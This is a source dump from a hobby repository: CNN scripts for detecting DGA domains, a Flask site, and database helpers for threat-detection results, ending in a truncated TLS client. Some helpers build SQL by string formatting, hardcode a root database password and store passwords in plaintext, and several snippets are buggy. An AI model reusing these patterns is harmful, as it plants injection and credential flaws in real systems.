graph_util\n\n'''数据预处理'''\ndef pad(dat, length=31, item=0):\n if len(dat)>length:\n dat=dat[0:length]\n else:\n dat.extend((length-len(dat))*[item])\n return dat\ndef domain2list(domain):\n diction = {'a':1,'b':2,'c':3,'d':4,'e':5,'f':6,'g':7,'h':8,'i':9,'j':10,'k':11,'l':12,'m':13,'n':14,'o':15,'p':16,'q':17,'r':18,'s':19,'t':20,'u':21,'v':22,'w':23,'x':24,'y':25,'z':26,'0':27,'1':28,'2':29,'3':30,'4':31,'5':32,'6':33,'7':34,'8':35,'9':36,'-':37}\n data=[diction.get(x,38) for x in domain]\n return pad(data)\ndef makeData(black=\"./data/dga.txt\",white=\"./data/top-1m.csv\"):\n X = []\n Y = []\n no_fetch_extract = tldextract.TLDExtract(suffix_list_urls=None)\n with open(black,'r') as f:\n data=f.readlines()\n for i in data:\n X.append(domain2list(no_fetch_extract(i.strip()).domain))\n Y.append([0])\n with open(\"./data/top-1m.csv\",'r') as f:\n data=f.readlines()\n for i in data:\n X.append(domain2list(no_fetch_extract(i.strip().split(',')[1]).domain))\n Y.append([1])\n X=np.mat(X)\n Y=np.mat(Y)\n return X,Y\ndef batch_iter(x, y, batch_size=512):\n \"\"\"生成批次数据\"\"\"\n data_len = len(x)\n num_batch = int((data_len - 1) / batch_size) + 1\n\n indices = np.random.permutation(np.arange(data_len))\n x_shuffle = x[indices]\n y_shuffle = y[indices]\n\n for i in range(num_batch):\n start_id = i * batch_size\n end_id = min((i + 1) * batch_size, data_len)\n yield x_shuffle[start_id:end_id], y_shuffle[start_id:end_id]\n\n'''获取已使用时间'''\ndef get_time_dif(start_time):\n end_time = time.time()\n time_dif = end_time - start_time\n return timedelta(seconds=int(round(time_dif)))\n\n'''评估在某一数据上的准确率和损失'''\ndef evaluate(sess, x_, y_,loss,acc):\n\n data_len = len(x_)\n batch_eval = batch_iter(x_, y_, batch_size)\n total_loss = 0.0\n total_acc = 0.0\n loss = tf.reduce_mean(cross_entropy)\n\n for x_batch, y_batch in batch_eval:\n batch_len = len(x_batch)\n loss_n, acc_n = sess.run([loss, acc], feed_dict={input_x: x_batch,input_y: y_batch,keep_prob: 0.25})\n total_loss += loss_n * batch_len\n total_acc += acc_n * batch_len\n return total_loss / data_len, total_acc / data_len\n\nif __name__ == '__main__':\n '''模型参数'''\n embedding_dim = 4 # 词向量维度\n seq_length = 31 # 序列长度\n num_classes = 1 # 类别数\n num_filters = 20 # 卷积维度\n kernel_size = 3 # 卷积核尺寸\n vocab_size = 39 # 词汇表达小\n dropout_keep_prob = 0.75 # dropout保留比例\n learning_rate = 0.001 # 学习率\n batch_size = 1024 # 每批训练大小\n num_epochs = 20 # 总迭代轮次\n print_per_batch = 1000 # 每多少轮输出一次结果\n save_per_batch = 1000 # 每多少轮存入tensorboard\n output_graph_name = 'model.pb' # 保存模型文件名\n output_fld = '/model/' # 保存路径\n '''载入训练集与验证集'''\n print(\"Loading training and validation data...\")\n X,Y=makeData()\n #vocab_size = len(X)\n x_train, x_val, y_train, y_val = train_test_split(X,Y,test_size=0.1)\n print(x_train.shape)\n print(y_train.shape)\n print(x_val.shape)\n print(y_val.shape)\n del X,Y\n\n '''建立模型'''\n print('Configuring CNN model...')\n # 待输入的数据\n #with tf.Graph().as_default() as g:\n input_x = tf.placeholder(tf.int32, [None, seq_length], name='input_x_')\n input_y = tf.placeholder(tf.float32, [None, num_classes], name='input_y_')\n keep_prob = tf.placeholder(tf.float32, name='dropout_keep_prob')\n #创建cnn模型\n with tf.device('/cpu:0'):#强制在CPU上执行操作\n embedding = tf.get_variable('embedding', [vocab_size, embedding_dim])\n embedding_inputs = tf.nn.embedding_lookup(embedding, input_x)\n with tf.name_scope(\"cnn\"):\n conv_1 = tf.layers.conv1d(embedding_inputs, num_filters, kernel_size, name='conv_1')\n maxp = tf.layers.max_pooling1d(conv_1, 2, 2)\n conv_2 = tf.layers.conv1d(maxp, num_filters, kernel_size, name='conv_2')\n maxp = tf.layers.max_pooling1d(conv_2, 2, 2)\n flatten = tf.contrib.layers.flatten(maxp)\n with tf.name_scope(\"score\"):\n # 全连接层,后面接dropout以及sigmoid激活\n fc = tf.layers.dropout(flatten,0.25)\n fc = tf.layers.dense(fc, 16, name='fc1')\n fc = tf.layers.dense(fc, num_classes, name='fc2')\n with tf.name_scope('output'):\n \t#输出层\n logits = tf.nn.sigmoid(fc, name='main_output')\n with tf.name_scope(\"optimize\"):\n # 损失函数,交叉熵\n cross_entropy = tf.nn.sigmoid_cross_entropy_with_logits(logits=logits, labels=input_y)\n loss = tf.reduce_mean(cross_entropy)\n # 优化器\n optim = tf.train.RMSPropOptimizer(learning_rate=learning_rate).minimize(loss)\n with tf.name_scope(\"accuracy\"):\n # 准确率\n logits = tf.cast(logits, tf.int32)\n y = tf.cast(input_y, tf.int32)\n correct_pred = tf.equal(logits, y)\n acc = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n tf.summary.scalar(\"loss\", loss)\n tf.summary.scalar(\"accuracy\", acc)\n merged_summary = tf.summary.merge_all()\n\n '''创建session'''\n session = tf.Session()\n session.run(tf.global_variables_initializer())\n \n '''训练模型'''\n print('Training and evaluating...')\n start_time = time.time()\n total_batch = 0 # 总批次\n best_acc_val = 0.0 # 最佳验证集准确率\n last_improved = 0 # 记录上一次提升批次\n require_improvement = 40000 # 如果超过40000轮未提升,提前结束训练\n flag = False\n for epoch in range(num_epochs):\n print('Epoch:', epoch + 1)\n batch_train = batch_iter(x_train, y_train, batch_size)\n for x_batch, y_batch in batch_train:\n #feed_dict = feed_data(x_batch, y_batch, 0.75)\n feed_dict = {input_x: x_batch,input_y: y_batch,keep_prob: dropout_keep_prob}\n if total_batch % print_per_batch == 0:\n # 每多少轮次输出在训练集和验证集上的性能\n loss_train, acc_train = session.run([loss, acc], feed_dict={input_x: x_batch,input_y: y_batch,keep_prob: dropout_keep_prob})\n loss_val, acc_val = evaluate(session, x_val, y_val, loss, acc) # todo\n time_dif = get_time_dif(start_time)\n msg = 'Iter: {0:>6}, Train Loss: {1:}, Train Acc: {2:>7.2%},' \\\n + ' Val Loss: {3:>6.2}, Val Acc: {4:>7.2%}, Time: {5}'\n print(msg.format(total_batch, loss_train, acc_train, loss_val, acc_val, time_dif))\n \n session.run(optim, feed_dict=feed_dict) # 运行优化\n total_batch += 1\n if total_batch - last_improved > require_improvement:\n # 验证集正确率长期不提升,提前结束训练\n print(\"No optimization for a long time, auto-stopping...\")\n flag = True\n break # 跳出循环\n #session.run(tf.assign(learning_rate, 0.001 * (0.95 ** epoch)),float32)#逐步降低学习率\n #learning_rate = session.run(lr)\n if flag: # 同上\n break\n\n '''保存模型'''\n if not os.path.exists(output_fld):\n os.makedirs(output_fld)\n with tf.Graph().as_default() as g:\n graph = session.graph\n input_graph_def = graph.as_graph_def()\n graph_util.convert_variables_to_constants\n constant_graph = graph_util.convert_variables_to_constants(session, input_graph_def, output_node_names=['output/main_output'])\n #由于采用了name_scope所以在main_output之前需要加上score/\n with tf.gfile.FastGFile(output_fld+output_graph_name, mode='wb') as f:\n f.write(constant_graph.SerializeToString())\n\n \n" }, { "alpha_fraction": 0.6083052754402161, "alphanum_fraction": 0.6161616444587708, "avg_line_length": 26.84375, "blob_id": "0d09ef8afc10a47198a6c3f0c8d381aae700a270", "content_id": "1e0276ef291bbb3004156992e94eb7f407f15d74", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 899, "license_type": "permissive", "max_line_length": 95, "num_lines": 32, "path": "/security/db_updata.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "import sqlite3\n\nconn = sqlite3.connect('admin_db.db')\nprint (\"Opened database successfully\")\n\nconn.execute('''CREATE TABLE IF NOT EXISTS admin\n (ID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,\n NAME TEXT NOT NULL,\n PASSWORD CHAR(20));''')\n\n## 插入数据\ndef insert_admin_data():\n\tconn = sqlite3.connect('admin_db.db')\n print(\"Please input NAME:\")\n NAME = input()\n print(\"Please input PASSWOED:\")\n PASSWOED = input()\n conn.execute(\"INSERT INTO admin (ID,NAME,PASSWORD) \\\n \tVALUES (null, ?, ? )\",list(NAME,PASSWOED))\n print (\"Records Insert successfully\")\n conn.commit()\n\nprint ('--------------------------- start fetch data from company --------------------------');\n\ncursor = conn.execute(\"SELECT id, name from admin\")\nfor row in cursor:\n print (\"ID = \", row[0])\n print (\"NAME = \", row[1])\n\nprint (\"Select Operation done successfully.\")\n\nconn.close()\n" }, { "alpha_fraction": 0.6590909361839294, "alphanum_fraction": 0.6704545617103577, "avg_line_length": 18.55555534362793, "blob_id": "809f4513f55a892f846258c69a4550387dffcbda", "content_id": "197bbb26feca8ad06a06697c39bbf8db63fd24cc", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 528, "license_type": "permissive", "max_line_length": 41, "num_lines": 27, "path": "/www.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "from flask import *\nfrom apps.restful import api\nimport json\nfrom flask_bootstrap import Bootstrap\n\napp = Flask(__name__)\nBootstrap(app)\napp.register_blueprint(api)\n\[email protected]('/')\ndef index():\n return render_template(\"base.html\")\[email protected]('/about')\ndef resume():\n return render_template(\"resume.html\")\n\[email protected]('/blog')\ndef blog():\n return render_template(\"blog.html\")\n\[email protected]('/link')\ndef link():\n return render_template(\"link.html\")\n\nif __name__ == '__main__':\n\n app.run(host='127.0.0.1',debug=True)\n" }, { "alpha_fraction": 0.716308057308197, "alphanum_fraction": 0.7180067896842957, "avg_line_length": 33.6274528503418, "blob_id": "de8cb7cb2c3e7ad00d6ecb862bf3cbab2c180035", "content_id": "987c2915414ec81a00b5b8dd89dc25d2b99ec336", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1782, "license_type": "permissive", "max_line_length": 111, "num_lines": 51, "path": "/AIE/change/keras_to_tensorflow_new.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "import sys\nfrom keras.models import load_model\nimport tensorflow as tf\nimport os\nimport os.path as osp\nfrom keras import backend as K\nfrom tensorflow.python.framework import graph_io\nfrom tensorflow.python.framework import graph_util\n#from tensorflow.tools.graph_transforms import TransformGraph\n\ndef freeze_session(session, keep_var_names=None, output_names=None, clear_devices=True):\n from tensorflow.python.framework.graph_util import convert_variables_to_constants\n graph = session.graph\n with graph.as_default():\n freeze_var_names = list(set(v.op.name for v in tf.global_variables()).difference(keep_var_names or []))\n output_names = output_names or []\n output_names += [v.op.name for v in tf.global_variables()]\n input_graph_def = graph.as_graph_def()\n if clear_devices:\n for node in input_graph_def.node:\n node.device = \"\"\n frozen_graph = convert_variables_to_constants(session, input_graph_def,output_names, freeze_var_names)\n return frozen_graph\n\n\ninput_fld = sys.path[0]\n\n#keras模型文件\nweight_file = 'bigru.h5'\n#tensorflow模型文件\noutput_graph_name = 'tensor_model.pb'\n\noutput_fld = input_fld + '/tensorflow_model/'\nif not os.path.isdir(output_fld):\n os.mkdir(output_fld)\nweight_file_path = osp.join(input_fld, weight_file)\n\nK.set_learning_phase(0)\nnet_model = load_model(weight_file_path)\n\n\nprint('input is :', net_model.input.name)\nprint ('output is:', net_model.output.name)\n\nsess = K.get_session()\n\nfrozen_graph = freeze_session(K.get_session(), output_names=[net_model.output.op.name])\n\ngraph_io.write_graph(frozen_graph, output_fld, output_graph_name, as_text=False)\n\nprint('saved the constant graph (ready for inference) at: ', osp.join(output_fld, output_graph_name))\n" }, { "alpha_fraction": 0.564214289188385, "alphanum_fraction": 0.6013842821121216, "avg_line_length": 26.85714340209961, "blob_id": "51aa61ec0038a053845f14a74fcfd520eb57cf72", "content_id": "a6da82d347311d90c27bf91136d7556606c165fc", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4007, "license_type": "permissive", "max_line_length": 265, "num_lines": 140, "path": "/AIE/keras/cnn_test.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "# coding: utf-8\n\nimport numpy as np\nimport tldextract\nimport keras\n\nfrom keras.preprocessing import sequence\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation\nfrom keras.layers.embeddings import Embedding\nfrom keras.layers.recurrent import LSTM,GRU\n\nfrom keras.layers import Bidirectional\n\nimport sklearn\nfrom sklearn.cross_validation import train_test_split\nimport sys \ndef pad(dat, length=31, item=0):\n dat.extend((length-len(dat))*[item])\n return dat\n \ndef domain2list(domain):\n diction = {'a':1,'b':2,'c':3,'d':4,'e':5,'f':6,'g':7,'h':8,'i':9,'j':10,'k':11,'l':12,'m':13,'n':14,'o':15,'p':16,'q':17,'r':18,'s':19,'t':20,'u':21,'v':22,'w':23,'x':24,'y':25,'z':26,'0':27,'1':28,'2':29,'3':30,'4':31,'5':32,'6':33,'7':34,'8':35,'9':36,'-':37}\n data=[diction.get(x,38) for x in domain]\n return pad(data)\n\ndef makeData(black=\"./data/dga.txt\",white=\"./data/top-1m.csv\"):\n X = []\n Y = []\n no_fetch_extract = tldextract.TLDExtract(suffix_list_urls=None)\n with open(black,'r') as f:\n data=f.readlines()\n for i in data:\n X.append(domain2list(no_fetch_extract(i.strip()).domain))\n Y.append(1)\n with open(\"./data/top-1m.csv\",'r') as f:\n data=f.readlines()\n for i in data:\n X.append(domain2list(no_fetch_extract(i.strip().split(',')[1]).domain))\n Y.append(0)\n\n X=np.mat(X)\n Y=np.mat(Y)\n return X,Y.T\n\n'''\ndef build_model(max_features, maxlen):\n #双向\"\"Build bi-GRU model\"\"\n # 定义顺序模型\n model = Sequential()\n model.add(Embedding(max_features, \n 32, #输出维度\n input_length=maxlen))\n model.add(Bidirectional(GRU(16)))\n model.add(Dropout(0.25)) #断开神经元的概率,防止过拟合\n model.add(Dense(16,activation=\"relu\")) #int 输出维度\n model.add(Dense(1)) #int 输出维度\n model.add(Activation('sigmoid'))\n keras.optimizers.RMSprop(lr=0.001, rho=0.9, epsilon=None, decay=0.0) \n model.compile(loss='binary_crossentropy',\n optimizer='rmsprop',\n metrics=['accuracy'])\n \n return model\n\n'''\nfrom keras.layers import Conv1D, MaxPooling1D,Flatten\ndef build_model(max_features, maxlen):\n \"\"\"Build cnn model\"\"\"\n model = Sequential()\n model.add(Embedding(max_features, \n 8, #输出维度\n input_length=maxlen))\n model.add(Conv1D(16,3))\n model.add(MaxPooling1D(2))\n model.add(Conv1D(16,3))\n model.add(MaxPooling1D(2))\n model.add(Flatten())\n model.add(Dropout(0.25))\n model.add(Dense(16))\n model.add(Dense(1))\n model.add(Activation('sigmoid'))\n\n model.compile(loss='binary_crossentropy',\n optimizer='rmsprop',\n metrics=['accuracy'])\n\n return model\n\n\nimport time\n\ntimestamp=time.strftime(\"%Y%m%d-%H%M%S\", time.localtime(time.time()))\nprint('Get data...')\nX,Y=makeData()\nX_train, X_test, y_train, y_test = train_test_split(X, \n Y, \n test_size=0.1)\ndel X,Y\nprint(X_train.shape)\nprint(y_train.shape)\nprint(X_test.shape)\nprint(y_test.shape)\n\n\nprint('Build model...')\n\nmax_features=39\nmaxlen=31\nmodel = build_model(max_features, maxlen)\n#plot_model(model, to_file='model.png',show_shapes=True)\nmodel.summary()\n\n\nbatch_size=512\nprint('Training start...')\nmodel.fit(X_train, y_train, #训练集\n validation_data=(X_test, y_test), #验证集\n batch_size=batch_size,\n verbose=1, # 进度条显示\n epochs=5) # 迭代次数\nprint('Training Done!')\n\n\n\nfileprefix=\"bigru\"\nmodel.save(fileprefix+\".krs\")\n\n\n# In[8]:\n\n\ntest_dat = X_test[:]\nprint(test_dat.shape)\nstarts=time.time()\nresults=model.predict_classes(test_dat,batch_size=512)\ntimecost=time.time()-starts\nprint(test_dat.shape[0],\"items\")\nprint(timecost,\"seconds\")\nprint(test_dat.shape[0]/timecost,\"-eps\")\n\n" }, { "alpha_fraction": 0.4334062337875366, "alphanum_fraction": 0.45827096700668335, "avg_line_length": 36.11538314819336, "blob_id": "8410c3d9947d6df6648ecf893dabfc3ddfd7b207", "content_id": "1ca73a734ea298d8f85ef48dfd2c01845f9d4790", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8939, "license_type": "permissive", "max_line_length": 177, "num_lines": 234, "path": "/search/service/data_show.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "import pymysql\nimport math\nimport json\nimport configs as C\nimport time,datetime\n#R = C.DATA_MYSQL\nR = {'host': \"localhost\", 'user': \"root\", 'password': \"123456\", 'database': \"AIE_Detect_Result\"}\n\ndb = pymysql.connect(host=R['host'], user=R['user'], passwd=R['password'], db=R['database'],\\\n\tcharset = 'utf8',cursorclass = pymysql.cursors.DictCursor)\n\n#获取威胁信息\ndef get_detect_result(type,current_page,page_size,beginTime,endTime):\n threat_type_dic = {\n \"00000\":\"common\", #输出全部\n \"10000\":\"abnormal_file\", #异常文件检测\n \"20000\":\"bruteforce\", #暴力破解\n \"30000\":\"cc_flow\", #CC通信\n \"40000\":\"webshell\", #webshell\n \"50000\":\"eca\", #异常加密通信\n \"60000\":\"dns_tunnel\", #DNS tunnel\n \"70000\":\"dga\" } #DGA域名检测\n threat_type_change = {\n \"abnormal_file\" : \"10000\", #异常文件检测\n \"bruteforce\" : \"20000\", #暴力破解\n \"cc_flow\" : \"30000\", #CC通信\n \"webshell\" : \"40000\", #webshell\n \"eca\" : \"50000\", #异常加密通信\n \"dns_tunnel\" : \"60000\", #DNS tunnel\n \"dga\" : \"70000\" } #DGA域名检测\n threat_type = threat_type_dic[type.decode('utf-8')]\n cursor = db.cursor()\n beginTime = time.strftime(\"%Y-%m-%d %H:%M:%S\",time.gmtime(beginTime))\n endTime = time.strftime(\"%Y-%m-%d %H:%M:%S\",time.gmtime(endTime))\n try:\n cursor.execute(\"SELECT COUNT(id) as num from AIE_Detect_Result where threat_type = '%s' and time_start <= '%s' and time_start >= '%s'\" % (threat_type,endTime,beginTime))\n data_num = cursor.fetchone()['num']#数据总数\n except:\n return [], 0, '4'\n try:\n total = int(math.ceil(data_num/page_size)) #总页数\n if total == 0: \n return [], 0, '6'\n offset = (current_page-1)*page_size\n except:\n return [], 0, '1'\n try:\n cursor.execute(\"SELECT * from AIE_Detect_Result where threat_type = '%s' limit %d offset %d\" % (threat_type,page_size,offset))\n data = cursor.fetchall()\n except:\n return [], 0, '4'\n try:\n items = []\n for el in data:\n el['threat_type'] = threat_type_change[str(el['threat_type'])]\n if el['time_start'] == None:\n el.update({\"AttackType\":el['threat_type'],\n \"AlarmLevel\":el['threat_level'],\n #\"AttackSubType\":\"10001\",\n \"AlarmTime\":el['time_start'],\n \"SrcIP\":el['sip'],\n \"DestIP\":el['dip'],\n \"SrcPort\":el['sport'],\n \"DestPort\":el['dport']})\n el.pop(\"threat_type\")\n el.pop(\"threat_level\")\n el.pop(\"time_start\")\n el.pop(\"sip\")\n el.pop(\"dip\")\n el.pop(\"sport\")\n el.pop(\"dport\") \n items.append(el)\n else:\n el.update({\"AttackType\":el['threat_type'],\n \"AlarmLevel\":el['threat_level'],\n #\"AttackSubType\":\"10001\",\n \"AlarmTime\":el['time_start'].strftime(\"%Y-%m-%d %H:%M:%S\"),\n \"SrcIP\":el['sip'],\n \"DestIP\":el['dip'],\n \"SrcPort\":el['sport'],\n \"DestPort\":el['dport']})\n el.pop(\"threat_type\")\n el.pop(\"threat_level\")\n el.pop(\"time_start\")\n el.pop(\"sip\")\n el.pop(\"dip\")\n el.pop(\"sport\")\n el.pop(\"dport\") \n items.append(el)\n except:\n return [], 0, '1'\n return items, total, '0'\n\ndef get_all_result(current_page,page_size):\n threat_type_change = {\n \"abnormal_file\" : \"10000\", #异常文件检测\n \"bruteforce\" : \"20000\", #暴力破解\n \"cc_flow\" : \"30000\", #CC通信\n \"webshell\" : \"40000\", #webshell\n \"eca\" : \"50000\", #异常加密通信\n \"dns_tunnel\" : \"60000\", #DNS tunnel\n \"dga\" : \"70000\" } #DGA域名检测\n cursor = db.cursor()\n try:\n cursor.execute(\"SELECT COUNT(id) as num from AIE_Detect_Result\")\n data_num = cursor.fetchone()['num']#数据总数\n except:\n return [], 0, '4'\n try:\n total = int(math.ceil(data_num/page_size)) #总页数\n print(total)\n if total == 0: \n return [], 0, '6'\n offset = (current_page - 1)*page_size\n except:\n return [], 0, '1'\n try:\n cursor.execute(\"SELECT * from AIE_Detect_Result limit %d offset %d\" % (page_size,offset))\n data = cursor.fetchall()\n except:\n return [], 0, '4'\n try:\n items = []\n for el in data:\n el['threat_type'] = threat_type_change[str(el['threat_type'])]\n #转换数据库字段\n if el['time_start'] == None:\n el.update({\"AttackType\":el['threat_type'],\n \"AlarmLevel\":el['threat_level'],\n #\"AttackSubType\":\"10001\",\n \"AlarmTime\":el['time_start'],\n \"SrcIP\":el['sip'],\n \"DestIP\":el['dip'],\n \"SrcPort\":el['sport'],\n \"DestPort\":el['dport']})\n el.pop(\"threat_type\")\n el.pop(\"threat_level\")\n el.pop(\"time_start\")\n el.pop(\"sip\")\n el.pop(\"dip\")\n el.pop(\"sport\")\n el.pop(\"dport\") \n items.append(el)\n else:\n el.update({\"AttackType\":el['threat_type'],\n \"AlarmLevel\":el['threat_level'],\n #\"AttackSubType\":\"10001\",\n \"AlarmTime\":el['time_start'].strftime(\"%Y-%m-%d %H:%M:%S\"),\n \"SrcIP\":el['sip'],\n \"DestIP\":el['dip'],\n \"SrcPort\":el['sport'],\n \"DestPort\":el['dport']})\n el.pop(\"threat_type\")\n el.pop(\"threat_level\")\n el.pop(\"time_start\")\n el.pop(\"sip\")\n el.pop(\"dip\")\n el.pop(\"sport\")\n el.pop(\"dport\") \n items.append(el)\n except:\n return [], 0, '1'\n return items, total, '0'\n\ndef get_algorithms_type_num():\n cursor = db.cursor()\n threat_type_dic = {\n \"abnormal_file\" : \"10000\", #异常文件检测\n \"brutefoce\" : \"20000\", #暴力破解\n \"cc_flow\" : \"30000\", #CC通信\n \"webshell\" : \"40000\", #webshell\n \"eca\" : \"50000\", #异常加密通信\n \"dns_tunnel\" : \"60000\", #DNS tunnel\n \"dga\" : \"70000\" } #DGA域名检测\n threat_type_num = []\n for threat_type in threat_type_dic:\n sql = \"SELECT COUNT(id) FROM AIE_Detect_Result WHERE threat_type = '%s'\" %(threat_type)\n cursor.execute(sql)\n num = cursor.fetchone()\n num_dic = {\"key\" : threat_type_dic[threat_type], \"doc_count\" : num[\"COUNT(id)\"]}\n threat_type_num.append(num_dic)\n return threat_type_num\n\ndef get_algorithms_level_num():\n cursor = db.cursor()\n threat_level_dic = {\n 1 : \"1\", #很低\n 2 : \"2\", #低\n 3 : \"3\", #中\n 4 : \"4\", #高\n 5 : \"5\"} #很高\n threat_level_num = []\n for threat_level in threat_level_dic:\n sql = \"SELECT COUNT(id) FROM AIE_Detect_Result WHERE threat_level = '%d'\" %(threat_level)\n cursor.execute(sql)\n num = cursor.fetchone()\n num_dic = {\"key\" : threat_level_dic[threat_level], \"doc_count\" : num[\"COUNT(id)\"]}\n threat_level_num.append(num_dic)\n return threat_level_num\n\nif __name__ == '__main__':\n try:\n threat_type = str(\"10000\").encode(\"utf-8\")\n current_page = int(\"1\")\n page_size = int(\"20\")\n except:\n items = []\n total = 0\n resultCode = '5'\n else:\n #items, total, resultCode = get_all_result(current_page,page_size)\n items, total, resultCode= get_detect_result(threat_type,current_page,page_size)\n \n rstJson = {\n \"resultCode\":resultCode,\n \"errDesc\":\"\",\n \"totalCount\":total,\n\t\"data\":items\n\t}\n try:\n json_data = json.dumps(rstJson)\n except:\n items = []\n total = 0\n resultCode = '5'\n rstJson = {\n \"resultCode\":resultCode,\n \"errDesc\":\"\",\n \"totalCount\":total,\n \"data\":items\n }\n json_data = json.dumps(rstJson)\n #return json_data\n print(json_data)\n\n\n" }, { "alpha_fraction": 0.5679324865341187, "alphanum_fraction": 0.6210970282554626, "avg_line_length": 30.741071701049805, "blob_id": "1d87c4fec0209beb38190b80e54e6159a3fcd073", "content_id": "339ba1383304c3cd337f30dc8d89f5a4a5ee90e1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3627, "license_type": "permissive", "max_line_length": 265, "num_lines": 112, "path": "/AIE/tensorflow/cnn_model_prediction.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "import tensorflow as tf\nimport os\nfrom tensorflow.python.framework import graph_util\nimport numpy as np\nimport time\nimport sklearn\nfrom sklearn.cross_validation import train_test_split\nfrom tensorflow.python.platform import gfile\nimport tldextract\n'''\ndef pad(dat, length=31, item=0):\n if len(dat)>length:\n dat=dat[0:length]\n else:\n dat.extend((length-len(dat))*[item])\n return dat\ndef domain2list(domain):\n diction = {'a':1,'b':2,'c':3,'d':4,'e':5,'f':6,'g':7,'h':8,'i':9,'j':10,'k':11,'l':12,'m':13,'n':14,'o':15,'p':16,'q':17,'r':18,'s':19,'t':20,'u':21,'v':22,'w':23,'x':24,'y':25,'z':26,'0':27,'1':28,'2':29,'3':30,'4':31,'5':32,'6':33,'7':34,'8':35,'9':36,'-':37}\n data=[diction.get(x,38) for x in domain]\n return pad(data)\ndef makeData():\n X = []\n X.append(domain2list('oiooiakkkkk'))\n X=np.mat(X)\n return X\n\ntest = makeData()#测试数据\n\nfrom tensorflow.python.platform import gfile\n\nsess = tf.Session()\nwith gfile.FastGFile('D:/data/'+'model.pb', 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n sess.graph.as_default()\n tf.import_graph_def(graph_def, name='') # 导入计算图\n\nsess.run(tf.global_variables_initializer())#初始化\n\n# 输入\ninput_x = sess.graph.get_tensor_by_name('input_x_:0')\nop = sess.graph.get_tensor_by_name('output/main_output:0')\n\nret = sess.run(op, feed_dict={input_x: test})\nprint (ret)\n'''\n\n\ndef pad(dat, length=31, item=0):\n if len(dat)>length:\n dat=dat[0:length]\n else:\n dat.extend((length-len(dat))*[item])\n return dat\ndef domain2list(domain):\n diction = {'a':1,'b':2,'c':3,'d':4,'e':5,'f':6,'g':7,'h':8,'i':9,'j':10,'k':11,'l':12,'m':13,'n':14,'o':15,'p':16,'q':17,'r':18,'s':19,'t':20,'u':21,'v':22,'w':23,'x':24,'y':25,'z':26,'0':27,'1':28,'2':29,'3':30,'4':31,'5':32,'6':33,'7':34,'8':35,'9':36,'-':37}\n data=[diction.get(x,38) for x in domain]\n return pad(data)\ndef makeData(black=\"./data/dga.txt\",white=\"./data/top-1m.csv\"):\n X = []\n no_fetch_extract = tldextract.TLDExtract(suffix_list_urls=None)\n with open(black,'r') as f:\n data=f.readlines()\n for i in data:\n X.append(domain2list(no_fetch_extract(i.strip()).domain))\n with open(\"./data/top-1m.csv\",'r') as f:\n data=f.readlines()\n for i in data:\n X.append(domain2list(no_fetch_extract(i.strip().split(',')[1]).domain))\n X=np.mat(X)\n return X\ndata = makeData()\nsess = tf.Session()\nwith gfile.FastGFile('D:/model/'+'model.pb', 'rb') as f:#打开模型文件\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n sess.graph.as_default()\n tf.import_graph_def(graph_def, name='') # 导入计算图\nsess.run(tf.global_variables_initializer())#初始化\n# 输入\ninput_x = sess.graph.get_tensor_by_name('input_x_:0')\nop = sess.graph.get_tensor_by_name('output/main_output:0')\ntrain_data, test_data = train_test_split(data,test_size=0.1)\nstarts=time.time()\nret = sess.run(op, feed_dict={input_x: test_data})\ntimecost=time.time()-starts\nprint(test_data.shape)\nprint(test_data.shape[0],\"items\")\nprint(timecost,\"seconds\")\nprint(test_data.shape[0]/timecost,\"-eps\")\n\n\n\n\n\n\n'''\nt = 5 #样本验证轮数\nstarts=time.time()\nfor i in range(t):\n starts_0=time.time()\n train_data, test_data = train_test_split(data,test_size=0.1)\n ret = sess.run(op, feed_dict={input_x: test_data})\n timecost_0=time.time()-starts_0\n print(test_data.shape)\n print(test_data.shape[0],\"items\")\n print(timecost_0,\"seconds\")\n print(test_data.shape[0]/timecost_0,\"-eps\")\n\ntimecost=time.time()-starts_0\nprint('time:', timecost)\n'''\n" }, { "alpha_fraction": 0.5140997767448425, "alphanum_fraction": 0.5297847390174866, "avg_line_length": 33.442527770996094, "blob_id": "96150362df2fbdeb7040a57e611e8a9a22f8677f", "content_id": "230c19e82884c61e8f7984d6a0b3ba967333146a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6123, "license_type": "permissive", "max_line_length": 159, "num_lines": 174, "path": "/security/client.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "import socket\nimport hashlib\nimport os\nimport struct\nimport ssl,argparse\n\ndef InitHost():\n host = \"\"\n with open(\"./host.txt\",\"r\") as fd:\n n2 = fd.readlines()\n for n in n2:\n return n\n\n\n\n\n\n\nclass FileClient():\n def __init__(self):\n self.action = ''\n self.fileName = ''\n self.md5sum = ''\n self.clientfilePath = ''\n self.serverfilePath = ''\n self.size = 0\n self.cafile = \"./cert/ca.crt\"\n self.host = InitHost()\n self.server_port = 9999\n self.dataFormat='20s20s8s32s100s100sl'\n\n def struct_pack(self):\n ret = struct.pack(self.dataFormat, self.username.encode(), self.pwd.encode(), self.action.encode(), self.md5sum.encode(), self.clientfilePath.encode(),\n self.serverfilePath.encode(), self.size)\n return ret\n\n def struct_unpack(self,package):\n self.username, self.pwd, self.action, self.md5sum, self.clientfilePath, self.serverfilePath, self.size = struct.unpack(self.dataFormat, package)\n self.username = 